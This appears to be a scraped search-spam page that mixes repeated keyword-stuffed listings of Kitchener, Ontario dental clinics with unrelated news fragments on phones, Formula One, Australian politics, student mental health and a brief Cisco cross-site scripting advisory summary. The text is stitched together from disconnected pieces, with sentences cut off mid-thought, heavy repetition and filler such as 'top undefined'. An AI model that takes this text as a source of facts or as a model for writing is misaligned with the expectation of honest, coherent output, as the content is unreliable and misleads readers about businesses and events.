Nancy Denturist, Danube Dental. Handpicked Top 3 Dentists in Kitchener. We check reviews, ratings, reputation, history, complaints, satisfaction, trust, cost and their general excellence. DR. KYLE HORNBY, DDS 77 Water St N, Kitchener, ON N2H 5A6 Since 1970 DANUBE DENTAL CLINIC. Now, a few years ago, the Ontario provincial government invested in pain clinics. So, for example, Hamilton has very good. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients. In addition to a federal minimum wage, the seven-person panel — which included Mary Gellatly of Parkdale Community Legal. . About Dental Clinics See the best rated dentists specializing on fillings, extractions, cleaning &amp; whitening of total 72 dental clinics in Kitchener, Ontario, Canada. Compare dental clinic quality apples-to-apples on 5-star GCR Score rating. Read over 240 reviews on dental doctors. Most Popular Dental Clinic In Kitchener Ontario Laurentian Dental Voted Best Kitchener Dentist Thank you for voting Laurentian Dental as your Favourite Kitchener Dental Office in The Record, Readers’ Select Awards! We sincerely care about your teeth, your smile, and you as an individual. Our goal is to help. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Preferred Dentist In Kitchener Ontario Best Dental Clinic Near Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral dental care (cleaning) at. Falls public health site to open this fall – In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/ Fairway Dental Urgent Care Clinic Kitchener Dentists -&gt; Source . Dentist Waterloo – Best dental clinic in Waterloo, Kitchener offering trusted emergency dental care services to clients. Call 5195768510 to book an appointment. Kid Friendly Dental Clinic In Kitchener Preferred Dental Clinic Near Kitchener Ontario Brides Wanted – job or abroad preferred. Two sisters married &amp; in USA &amp; Italy. CL19055180 Canada PR Arora Gursikh teetotaller 1991 born/ 6′, B.Tech. (India) PG Diploma (Kitchener – Ontario) privately employed boy, Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in Kitchener and Waterloo areas since 1996. Dr. Paul Tan and associates are committed to excellence in family dentistry and general dental care. We welcome new. Enquire for a fast quote. Choose from 2 General Anesthesia for dental treatments Clinics in Kitchener find the best one for you. Patients of all ages are welcome at this dental clinic located at Kitchener in Ontario and the main objective of the team is to care. Preferred Dental Clinic Near Kitchener Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation. Preferred Dental Clinic In Kitchener Ontario Best Dentist -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2018/12/31/preferred-dental-clinic-in-kitchener-ontario-6. Kid Friendly Dentist In Kitchener D’Amato: In an Ion-centric world, let’s not forget the ordinary bus passenger – She lives on Margaret Avenue in Kitchener. To get to her dentist on the other side of the city. But now there is no seat, KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. KW Dentists Toggle navigation Dentistry Services. Damm loved people, kids – This year’s family friendly event is set for May 16 at Olcott Park in Virginia. services with a variety of crisis needs and things they struggle to pay, such as dental procedures and anesthesia, Number 1 Dentist In Kitchener Pair facing drug. Family ties: Kat Surin looks to follow in dad’s footsteps on track – "But we started (in 2015) and he ran like 10 metres, and then I think he pulled everything honestly." Friendly family rivalry. Top Dentist Near Kitchener KITCHENER — Seniors living in two apartment. buildings to the stores clustered together on Weber near Franklin Street, How many times has the dental hygienist told you. It has hook scrapers on either end to help get between your teeth and. Waterloo Region surges into top ranks for auto theft in Ontario – They include: •Victoria Street North in Kitchener. and Tahoes lead the annual list of top 10 stolen vehicles, according to. All you have to do is complete a search for “dentistry near me” and you will be presented with many options. Conduct your. Toronto, Vancouver lead Canada in CBRE’s top tech talent ranking – Toronto’s rank near the top of the list speaks for itself. He said the city’s tech ecosystem is well established, Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut? Menu. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t fear, we’re. As a top-rated dentist, Kitchener East Family Dental offers a complete array of cosmetic dentistry treatment and procedures to help you get the results you’re. Preferred Dental Clinic Near Kitchener Preferred Dental Clinic Near Kitchener Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation dentistry, pediatric dentistry, or a top quality general dentist, we can meet your needs, and Q4. At a groundbreaking ceremony last July, officials said the new site will provide the in-house services currently offered at. Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7. Preferred Dental Clinic In Kitchener Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s needs and with children of. Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation dentistry, pediatric dentistry, dental implants, teeth whitening, or a top quality general dentist, we can meet your needs, and exceed them. Preferred Dental Clinic In Kitchener Ontario Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Kitchener East Family Dental in Kitchener, ON offers comfort and convenience and services such as pediatric, cosmetic, and sedation dentistry, dental implants and teeth whitening. Call today to schedule your appointment! As well, people aren’t using other barriers, such as a dental dam during oral sex. Johal says the clinics at Waterloo and. Highest Rated Dental Clinic Near Kitchener Dentists Near Me Ramirez Family Dentistry 509 Wilson Ave ##14, Kitchener Fairway Dental Urgent Care Clinic – Kitchener 385 Fairway Rd S #203, Kitchener Solar Dental Kitchener – Fairway 655 Fairway Rd S Toothworks Fairview Park 2960 Kingsway Dr. Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proudly providing dentistry in. BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. Number 1 Dental Clinic Near Kitchener Ontario Walk-In Clinic in Kitchener We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Clinic with X-ray, lab facilities and pharmacy on site. We are open seven days a week and have been since 1990. With our history and. Rise of STIs in Waterloo region aligns with rise across Canada – As well, people aren’t using other barriers, such as a dental dam during oral sex. Johal says the clinics at Waterloo. who. Nancy Le Denture Clinic serving the Kitchener Waterloo &amp; Cambridge area for over 20 years. We provide services for complete dentures, partial dentures, repairs, relines and other dental needs. Nancy Le Denture Clinic serving the Kitchener Waterloo partial. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Danube Dental. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you. Number 1 Dental Clinic Near Kitchener Walk-In Clinic in Kitchener We are the most established Urgent Care Clinic in all of Kitchener Waterloo and the only Urgent Care Clinic with X-ray, lab facilities and pharmacy on site. We are open seven days a week and have been since 1990. With our history and. Mission of Mercy Pittsburgh will host a free dental clinic. It is near the Mario Lemieux statue. Clinic officials. Top Dentist Near Kitchener Number 1 Dentist Near Kitchener Ontario The shooting at the plaza on Fairway Road near Wilson Avenue. Courtland Avenue East, Kitchener A bullet strikes the front. We care about your satisfaction and this is our number one priority! Our practice provides a full range of dental treatments and services including, but not limited to: Regular Dental Check-ups, Kid Friendly Dentist Near Kitchener Ontario Oshawa produces some of Canada’s top musicians — but it’s running out of venues for them to play – So I think the suburbs would be a big part of why there are successful musicians coming out of these areas because they’re kids who got bored and put all. on Simcoe St. The Velvet Elvis is now a. That Sudbury Sports Guy: Bringing out their best — Garrett Rank downs sibling Kyle to win Idylwylde Invitational – Coe was not about to kid himself. “I’m swinging way over my weight in championship flight,” he said. “It’s a different mindset for sure, but for me, it was all about Friday night.” And with Garrett. Explore the most popular Kid Friendly trails near Kitchener with hand-curated trail maps and driving directions as well as detailed reviews and photos from hikers, campers and. Most Popular Dentist In Kitchener Number 1 Dentist In Kitchener Ontario Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut. complete oral dental care (cleaning) at affordable prices. If you’re apprehensive about visiting the dentist, don’t fear, we’re equipped. Friendliest Dentist In Kitchener Ontario Friendliest Dentist In Kitchener Ontario Great apartment in a century house that is a 10-minute walk to either downtown Kitchener or Waterloo. Parking, washer/dryer, wifi, full kitchen. In 2017, a review of workplace standards in Ontario commissioned by the Ministry of Labour, found that only 23 per cent of. Top Dental Clinic Near Kitchener With gradual transformation in the trend of oral treatment from traditional techniques to innovative and technologically. Find the Top Dental Hygienists in Kitchener, ON Enter your location so we can match you with dental hygienists near you Go. Nancy Hall is delighted to welcome you and your family to her clinic. Nancy Hall &amp; Associates Dental Hygiene Care specializes in. A DENTAL clinic next to a top York restaurant is set to be converted into a home. which is on the corner of Hetherton Street near the entrance to Marygate Car Park. The unit also offers beauty. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON community. Want to see who made the cut?. We're Dentist Waterloo – Best dental clinic in Waterloo, Kitchener offering trusted emergency dental care services to clients. Call 5195768510 to book an appointment. Call 5195768510 to book an appointment. Falls public health site to open this fall – In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services.</t>
  </si>
  <si>
    <t>Huawei is holding its Developer Conference in China, and we’ve already heard about its new HarmonyOS and Honor television plans. The company has now also confirmed when the Android Q / EMUI 10 beta program starts for the Huawei P30 and P30 Pro. That date is September 8, reports 9to5Google, at which point you’ll be able to take the new OS for a spin on the latest flagship phones (no mention of the P30 Lite, as yet). Huawei also confirmed which other phones will get the update at a later stage – a list which closely matches the one given to TechRadar back in June. The phones in line for an update are: Huawei Mate 20 Huawei Mate 20 Pro Huawei Mate 20 Porsche Design Huawei Mate 20 Lite Huawei Mate 20 X Huawei Mate 20 X (5G) Huawei Mate 10 Huawei Mate 10 Pro Huawei Mate 10 Porsche Design Huawei P20 Huawei P20 Pro Huawei P Smart Huawei P Smart+ 2019 Huawei P Smart Z Honor 20 Honor 20 Pro Honor 20 Lite Honor View 20 Honor 10 Honor 10 Lite Honor 8X That should offer some reassurance for those worried about Huawei’s ongoing battle with the US government and its access to Google software. Right now it looks as though tensions are easing, though there have already been plenty of twists and turns in the story so far, and there might be more to come. New features arriving with Android Q and the EMUI 10 software Huawei builds on top include a system-wide dark mode, and new options for connecting your phone with your computer (which sounds a bit like Samsung DeX). Waiting for the Mate 30 Also from Huawei’s conference, one of the company’s executives may have revealed when we can expect the Huawei Mate 30 and the Mate 30 Pro to get their official reveal. These devices are due to launch on September 19, reports XDA Developers, though that’s based on a translation of a conversation held during a media briefing session – so it’s not quite set in stone yet. Huawei Consumer Business Software President Dr. Wang Chenglu highlighted the date as the day when we’d see the new flagship phones as well as the new Kirin 990 processor, though Huawei usually waits until October to launch its Mate phones. The Mate 30 and Mate 30 Pro should rock up with upgraded camera systems, and running Android Q / EMUI 10 (though the Mate 30 Lite might be a different matter). Of course we’ll bring you all the news and rumors as we get them. Huawei Mate 30 leak points again to an unusual camera arrangement Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: We have a date for the Huawei Android Q beta – and maybe the Mate 30 launch</t>
  </si>
  <si>
    <t>Peter Sterling</t>
  </si>
  <si>
    <t>The Sea Eagles' premiership charge has been built on another band of brothers playing the same positions as some of the club's favourite sons.</t>
  </si>
  <si>
    <t>Avengers: Endgame may have wrapped up the MCU in a neat (albeit emotional) bow but we are still looking to scratch that superhero itch – and we're hoping Crystal Dynamics' Marvel's Avengers game will be just the ticket. Marvel’s Avengers sees players taking on the roles of the most popular Avengers characters around in a single-player, story-driven game which also features four player co-op missions – because you can't save the world alone. In addition, new characters, regions, and missions will be added for free post-launch, as part of a continuous multi-year plan for the game. But who is on the super roster? The playable characters revealed s… TechRadar – All the latest technology news The post Best superhero games: what to play while waiting for Marvel’s Avengers to assemble appeared first on Crosat - News from the entertainment and multimedia.</t>
  </si>
  <si>
    <t>MythBusters hopefuls have been building devices, testing limits, and generally geeking out.</t>
  </si>
  <si>
    <t>Baily Hill</t>
  </si>
  <si>
    <t>There is an exciting buzz from the FNQ football pitches as a wave of new female talent emerges. Reggie Davani, who has recently been appointed FNQ Technical Development Manager to the club has shown confidence in his players and expresses excitement at what the future holds. First up, original Cairns midfielder Morgan Stanton has come out on top as she continually strives for success. Before an injury send her off the pitch, Stanton scored an impressive 43 goals last year whilst competing at the Community Cup for The Strikes. Stanton’s fierce determination accompanied with her athletic stamina is a formula for triumph. “I want to get identified or scouted … so I’m working hard.” “You have to really focus on your play and your mindset. It’s intense”, she told Cairns Post. Stanton has all the right qualities and sets her sights on following the path of her idols who play for the Matildas. If you didn’t know who Morgan Stanton was, you definitely will do now as she is set to storm the pitch as we expect great things to come from her in the future. Next up is Aleeah Davern who is a midfielder for the Leichhardt Lions Premier League and demonstrates a powerful play on the pitch. Davern will only improve and grow in confidence as she dominates the pitch and impresses spectators with her strong performance and techniques. Despite Davern’s young age, she was invited to represent Queensland at the Girls National Training Centre Challenge for Under 17’s. This experience is vital for regional players to interact with other female football talent. It is also a unique opportunity to show off to FFA officials and Australian national team selectors. Molly Waddingham left a striking impression as she was the second junior league player asked to represent Queensland and join the Brisbane Roar/ QAS at the Australian Institute of Sport. Waddingham competed in Canberra for the Football Federation Australia (FFA) Girls National Training Centre (NTC) Challenge for the Under 17’s. It is clear Waddingham has set the bar high as head coach David Da Silva was impressed by her performance and encourages regional players like Waddington to take opportunities that expose their skill and are able to see the standard of other players. Photo: Anna Rogers Thirteen-year-old Alesha Mills is a name to remember as she makes her mark on the football grounds. At the start of her career Mills has already made her name known playing for Peninsula and the Queensland School Sport side. Mills was amongst the best players selected, including Waddingham from Cairns to represent FNQ in the Bill Turner Football State finals. Players who frequently push themselves to play against opposition team, allow the chance for greater development and bettering their skill and knowledge within the game. Twins Kylie and Monica Vecchio are the latest siblings to exhibit talent at the top of their game. After a positive time playing for Innisfail United, there was an exciting buzz around their move to Edge Hill United. Kylie has made a reputation for herself as she scored 10 goals with her previous club, positioning herself as stricker for Edge Hill United. Monica, a strong defender, has shown her skill in scoring as she also made three goals in her previous season. Tonia-Marie Rantucci was chosen to represent Queensland at the Westfield National Youth Championships last year in Coffs Harbour and has gone from strength to strength ever since. It is clear Rantucci has a lot to give in the game and she pushes boundaries on the pitch. Ticara-Jane Argent is an achiever on the field and showcases a strong sense of football ability. Argent has played alongside players such as Mills when representing Queensland making her name known as a fast defender and goalkeeper. Mia Bailey, also known for her outstanding goalkeeping has recently moved across to play for Brisbane. Bailey is on the right path to becoming a player for the national senior team as her strengths continue to grow. Photo: Branden Randke It is evident that the standard of young female football players is developing fast. Providing the next generation of Australia’s female footballers with the appropriate coaching is vital to the future of the sport and their players. Ensuring that facilities are designed to enhance each players skills and are equip to the growing demand and standard of the sport. Cairns Post, Football Queensland, Daily Telegraph The post The new junior female FNQ Footballers expecting big victories appeared first on WSN.</t>
  </si>
  <si>
    <t>Reporter</t>
  </si>
  <si>
    <t>Young Dundee footballers from St John’s High School enjoyed a trip to Hampden Park on the first day of the new term.</t>
  </si>
  <si>
    <t>Josh Robertson And Natalie Whiting</t>
  </si>
  <si>
    <t>An attempt by Australian authorities to deport a convicted criminal to Papua New Guinea fails when authorities in that country refuse the man entry and vow to send him back to Australia.</t>
  </si>
  <si>
    <t>Australian Gabriela Ruffels has reached the final of the United States women's amateur golf championship, continuing her stellar form in America.</t>
  </si>
  <si>
    <t>The raft has been compared in size to Manhattan, Washington and 20,000 football ovals.</t>
  </si>
  <si>
    <t>rick5042</t>
  </si>
  <si>
    <t>Sporty Look. Black Carbon Fibre Dial. Contrast between the case and the bracelet. Red Accents on a Black Dial. Features: Stainless Steel Case Stainless Steel Bracelet Chronograph 100m Water resistant Day Function Black Carbon Fibre Dial Luminous Hands and Markers Case Size 45.8mm Stopwatch Measures 60 Minutes In 1/5th Of A Second Increments with split/lap time Red Accents Mineral Crystal Pull Out Crown Tachymeter</t>
  </si>
  <si>
    <t>Mattia Binotto admits there is very little satisfaction to take away from the Hungarian Grand Prix weekend despite Sebastian Vettel and Charles Leclerc finishing third and fourth respectively on Sunday. Both Scuderia Ferrari drivers were over a minute down on race winner Lewis Hamilton despite only pitting the once compared to the double visit to the pit lane for the Mercedes AMG Motorsport driver. Binotto, the Team Principal of the Maranello-based outfit, said the lack of downforce played against Ferrari at the Hungaroring, and coupled with the hot conditions made for a difficult race for both drivers. “We can’t take satisfaction from today’s result, when what was mainly to blame was a lack of aero downforce, which at the moment penalises us even more in the race than in qualifying,” said Binotto. “The hot conditions did not help and actually caused us more problems in terms of reduced grip levels.” Leclerc ran third for the majority of the afternoon only to see team-mate Vettel catch and pass him in the closing stages, remnants of the German pitting later than the Monegasque for his one and only pit stop. “Sebastian did a good job of managing the tyres in the first stint, thus lengthening it, which meant he could fit the softs and run with them to the chequered flag,” said Binotto. “However, we have to understand why Charles’ tyres wore so much and fix it for the coming races. “We pitted him, as his rears were very used and there was nothing else we could do. From a track on which we knew we would struggle, we still head home with the same number of points of our closer rivals.” Binotto says they will analyse just what went wrong in Hungary prior to the summer shut down but they will come back fighting in Belgium, which comes just one week ahead of the teams’ home race in Italy. “Next week we will continue to work on analysing data and preparing for the next two races in Spa and Monza,” said Binotto, “however, before then we have the summer break which will be good for the entire team, that has really worked so hard over the past few months.”</t>
  </si>
  <si>
    <t>ശ്രീലങ്കയിലെ മൂന്നാർ – A drive to Nuwara Eliya Hill Station, Srilanka Trip EP #6 The post ശ്രീലങ്കയിലെ മൂന്നാർ – A drive to Nuwara Eliya Hill Station, Srilanka Trip EP #6 appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>THE GRAND TOUR presenter James May has just teased a brand new set of wheels, with the official release set to take place in new YouTube video, but the star didn’t seem too happy about his latest spoiler post. Daily Express :: TV and Radio Feed The Grand Tour: ‘I look like a t*t’ James May shares first look snap of new wheels</t>
  </si>
  <si>
    <t>Police seized metal poles, bear spray and other weapons and closed bridges and streets to try to keep the rival groups apart.</t>
  </si>
  <si>
    <t>Domestic travel magazine Australian Traveller has reinforced what many residents of the small town have long known — Yallingup is the best town in Australia.</t>
  </si>
  <si>
    <t>Manchester United's proposed move to sign Bruno Fernandes is under threat as Tottenham have tabled an offer for the £59m Sporting Lisbon midfielder</t>
  </si>
  <si>
    <t>SWITZERLAND BY TRAIN – First train trip Lausanne to Zurich The post SWITZERLAND BY TRAIN – First train trip Lausanne to Zurich appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Erin  Handley</t>
  </si>
  <si>
    <t>Pacific leaders slam Australia for putting politics ahead of their island neighbours, after the Scott Morrison-led delegation undermined a consensus on a climate change communique.</t>
  </si>
  <si>
    <t>Australia would once have refused to loan money to PNG but what was once unthinkable is now very much a possibility. One important thing has changed, writes Shane McLeod.</t>
  </si>
  <si>
    <t>Rebecca Puddy</t>
  </si>
  <si>
    <t>It was meant to provide hundreds of jobs for South Australians, but the arts and entertainment union says watered down SA film rules will see local workers miss out on the Mortal Kombat action.</t>
  </si>
  <si>
    <t>Focused prevention policies and management practices are essential to tackle this global workplace problem.</t>
  </si>
  <si>
    <t>U.S. President Donald Trump doubled down on his comments accusing American Jews who vote for Democrats of “great disloyalty” Wednesday, saying any vote for a Democrat is a vote against Israel. CBC | World News</t>
  </si>
  <si>
    <t>Depression a deep and growing problem among students Original Source This week has seen the launch of a report by Union of Students in Ireland (USI) highlighting very high levels of mental health problems, depression, stress and anxiety among third-level students. To me this looks like (more) convergent evidence. Depression is often described as a disease of modernity. The rise in incidence and prevalence of depression since the turn of the 20th century has been incremental and unrelenting. Each new generation appears to suffer more than the previous one. Some will argue that findings such as these are artefactual. And questions can be raised about the study. Relying as it did on students to complete an online survey about mental health, it may attract a particular cohort of respondents. Those with mental health problems may be more motivated to respond to the survey. This can inflate the apparent incidence of problems. Equally, relying on surveys may lead to inflated reports of psychological distress. These two factors may be enough to allow some to dismiss what at first glance looks like a very high incidence of depression and anxiety, estimated at about one in three third-level students. I think we would be better off taking the report seriously. Cross-cultural studies Globally the prevalence and risk of depression are rising, some going so far as to call it an epidemic. Serious effort has now been invested into understanding why rates continue to rise. Cross-cultural studies, where risk and prevalence rates between cultures are compared, highlight a few important culprits. And it is interesting to see that the USI survey reflects that these same forces are at work in our student population. It is one of the great paradoxes of modern psychiatry that wealth and happiness have not been bedfellows. The past century, which saw such important advances in physical health, has delivered more unhappiness. Rising GDP, generally taken as a marker of modernity, is associated with rising rates of depression. This has encouraged researchers to think about what aspects of modern-day lifestyles are undermining psychological well-being. Current thinking is that there are three important culprits: inequality, social isolation and sedentary lifestyles. Globally inequality has risen dramatically since 1965. According to the World Bank, the incomes of even highly educated professionals such as doctors, lawyers, engineers and scientists have stagnated. On the other hand, the incomes of chief executives, for example, have risen to 354 times that of average workers. The bulk of students in the USI survey report they are financially dependent on others, mostly parents. This is likely to mean that young people from all but the most affluent homes are likely aware of the financial pressure that a college education is placing on their parents. And indeed we see in the student survey those dependent on loans and in debt were most likely to be severely anxious and depressed. The students I meet on a day-to-day basis are hardworking and socially responsible young adults. And so one of the very clear consequences of the increasing cost of college and housing is that many students are keen to secure part-time employment to deal with financial pressure. In reality, this means engagement with a full-time course with the associated full-time examination and coursework commitments while holding down a job. Over the last 10 years, it has been apparent that the rising cost of college has meant that all but very few students work their way through college. And so participation in college life, in particular extracurricular activities, is often sacrificed. This has had two unfortunate consequences. Extracurricular activities can be key sites for the development of social connections and important vehicles for exercise or sport. They can be seen as central to combating the isolated and sedentary lifestyles that are the two other culprits associated with rising depression. Reflecting this, the USI survey highlights the link between mental health and participation in these types of activities. Upward spiral This is a real shame. There is an upward spiral of psychological function associated with social connections and physical activity. The Growing up in Ireland survey – a long term study of children’s lives – shows that fitness and participation in group activities was also associated with enhanced cognitive performance. In short, maintaining your mental health facilitates academic achievement. Students should try to strike a balance. Depression appears to be linked to the mismatch between modern ways of living and healthy psychological functioning. Some of the aspects of our environment we can control and manage in the short term. Others are longer-term political projects. If someone is struggling with financial woes, balancing employment and study, deprived of time for exercise and isolated from peers, their life will feel like a struggle. They need to talk to those upon whom they depend financially about solutions to get through this academic year. Step back and make one change to facilitate your connections with others. Find a way to become less sedentary. Talk and walk. Orla Muldoon is professor of psychology at the University of Limerick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Depression a deep and growing problem among students appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>It was supposed to be a fun night out but after Neighbours star Scott McGregor stepped into a Gold Coast strip club, it ended with blood on his face.</t>
  </si>
  <si>
    <t>There is a magnificence about tall ships, the grande dames of the nautical world, who parade the oceans like haughty queens, their sails imbuing them a whimsical air of majesty and romance.</t>
  </si>
  <si>
    <t>The Prime Minister has used his official visit to Vietnam to declare his support for the sovereignty of Indo-Pacific nations, the Queensland opposition claims the Premier has broken the law when her office accidentally named an ASIO agent and a Sydney magistrate who indecently assaulted a teenage boy has been sentenced to one year and four months in jail. Image: AP</t>
  </si>
  <si>
    <t>Fears about Brexit and Labour's tax policies are driving out non-doms, say experts. The post Number of super-rich non-doms in UK at record low appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>A vulnerability in the web portal framework of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based interface. The vulnerability is due to improper input validation of log file content stored on the affected device. An attacker could exploit this vulnerability by modifying a log file with malicious code and getting a user to view the modified log file. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or to access sensitive, browser-based information. Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. This advisory is available at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190807-nfv-xss Security Impact Rating: Medium CVE: CVE-2019-1973 Published at: August 08, 2019 View on cisco.com The post Cisco Enterprise NFV Infrastructure Software Cross-site Scripting Vulnerability appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Best Dental Clinic In Kitchener Ontario Dentist Waterloo – Best dental clinic in Waterloo, Kitchener offering trusted emergency dental care services to clients. Call 5195768510 to book an appointment. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral de. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Most Popular Dentist In Kitchener Ontario And despite all the high-profile complaining, loosening provincial booze rules appears enormously popular. overturn) Ontario’s shift towards retail liberalization. Whatever the incremental effects. Canadian Real Estate Association reports home sales climbed higher in July – The increase came as sales were up in most of the country’s largest markets. Double-digit price gains in several Ontario. Friendliest Dental Clinic In Kitchener Ontario Enquire for a fast quote. Free consultation. Choose from 14 Dentists in Waterloo, Ontario with 2 verified patient reviews find the best one for you. See popular locations and treatments. Patients of all ages are welcome at this dental clinic. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his. Kitchener Denture Clinic is your source for high-quality denture fabrication and repair services. Ontario, St. George Village Dental is committed to providing excellent dental care in a comfortable and relaxed setting. . Dental Clinics &amp;. Highest Rated Dental Clinic In Kitchener Here is the definitive list of Kitchener's dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently. Stanley Park Dental Centre (now known as Grand River Dental Care), proud. Kid Friendly Dental Clinic In Kitchener Kitchener East Family Dental in Kitchener, ON offers comfort and convenience and services such as pediatric, cosmetic, and sedation dentistry, dental implants and teeth whitening. Call today to schedule your appointment! Highest Rated Dental Clinic In Kitchener BEST RATED » KITCHENER ON » DENTISTS The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. DANUBE DENTAL CLINIC – Dental Cleanings, Dental Fillings, Root Canal Treatments, Root Canal Re-Treatments, Surgical and Non. . The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. Chris Lauf is one of the best dentists in Aspley. to carefully listen to each patient’s needs and clarifying any concerns. Cosmetic Dental Clinic In Kitchener Ontario Cambridge Dentist,Family and Cosmetic Dentistry in Kitchener/Waterloo/Cambrdige. Highland Dental Office, Ottawa South Dental Office and Infinite Dental office. Dentist in Kitchener,Waterloo and Cambridge, Ontario area. . 95% of our patients say they'd recommend us to friends. Get started today! Reserve an appointment online now. Dentist, cosmetic dentist, dental clinic, emergency. Dr. Hurlbut, Dr. De Miglio and their Kitchener dental team know and. Forest Hill Family Dental is a dental clinic based in Kitchener/Waterloo. We provide general and cosmetic dentistry services and promise to provide honest, individualized treatment. Our team consists of dedicated individuals who are kind, Friendliest Dental Clinic In Kitchener For a more productive dental practice, keep your inventory in control. Here are some tips when handling your inventory in. Best Dental Clinic Near Kitchener Ontario Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/ Fairway Dental Urgent Care Clinic Kitchener Dentists -&gt; Source . . Dentist Waterloo – Best dental clinic in Waterloo, Kitchener offering trusted emergency dental care services to clients. Call 5195768510 to book an appointment. We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, bonding, dental implants, specialty dental services, smile makeovers and best of all – complete oral de. Best Dental Clinic Near Kitchener “The second I started studying for the DAT (Dental Admission Test), things. to spending part of her office hours at the. In a relaxing and fun atmosphere we can provide you and your children with the best kind of dental care and education. Website by Optio Publishing Station Dental 286 Duke Street West Kitchener ON N2H 3X8 Phone: (519) 745-7725 Fax: (519). Dentist Waterloo – Best dental clinic in Waterloo, Kitchener offering trusted emergency dental care services to clients. Call 5195768510 to book an appointment. We Love to See You Smile! – Our main goal is to make patients of all ages feel at ease when they visit our clinic. We love what we do, and our patient’s smiles say it all! We specialize in a wide range of dental services. Best Dentists in Kitchener, ON – Solar Dental, King Street Dental Centre, Fairway Dental Urgent Care Clinic, Arvanitis &amp; Associates Dentistry by Design, de Man &amp; Höediono Dentistry, Westheights Dental Centre, Le Nhan Nancy Denturist, Number 1 Dentist In Kitchener About 10 minutes later, an explosion occurred, destroying one house and damaging several others. On Thursday morning. 94-year-old retailer Tepperman’s opens at former Sears store in Ancaster – As of Friday, Tepperman’s will have six stores in Ontario with locations in London, Sarnia, Kitchener. care of those. Top Dental Clinic In Kitchener Ontario Health and dental plans are also a must. Catherine Dunne, president of the Ontario Undergraduate Student Alliance, said. Pharmacist and Dental Hygienist: the most required professions. gets an average salary per year – $95,680. One of the top-paid professions in Canada is the pharmacist. Even in comparison. Top Dental Clinic Near Kitchener Ontario Best Dentist In 